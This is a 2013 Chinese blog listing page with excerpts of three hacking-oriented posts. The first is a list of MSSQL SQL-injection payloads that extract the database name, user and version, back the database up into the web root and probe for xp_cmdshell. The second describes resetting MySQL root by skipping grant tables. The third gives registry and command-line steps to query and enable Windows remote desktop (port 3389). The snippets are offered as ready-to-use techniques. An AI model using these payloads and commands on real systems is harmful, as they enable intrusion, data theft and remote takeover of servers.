摘要: 注入查阅1、返回的是连接的数据库名and db_name()>02、作用是获取连接用户名and user>03、将数据库备份到Web目录下面;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4、显示SQL系统版本and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5、判断xp_cmdshell扩展存储过程是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = &# 阅读全文
posted @ 2013-08-18 18:14 群叔 阅读(1029) 评论(0) 推荐(0) 编辑
摘要: 打开CMD窗口net stop mysql //停止MYSQLmysqld -nt --skip-grant-tables //跳过密码检测。 mysqld.exe在Bin目录下然后另外新打开一个cmd窗口输入mysql 直接回车可以以root权限进入mysqluse mysqlupdate user set password=password("新密码") where user="root";flush privileges;如果无错误提示,密码即可更改成功。 阅读全文
posted @ 2013-08-18 14:06 群叔 阅读(270) 评论(0) 推荐(0) 编辑
摘要: 3389常用命令:1.查询终端端口REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2.查看终端一技巧其实 可以首先可以 使用命令 tasklist /svc 查看, 找到服务名称为 Terms service 所对应的 ID, 在使用命令 netstat -ano3.开启3389终端REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server 阅读全文
posted @ 2013-08-18 12:04 群叔 阅读(762) 评论(0) 推荐(0) 编辑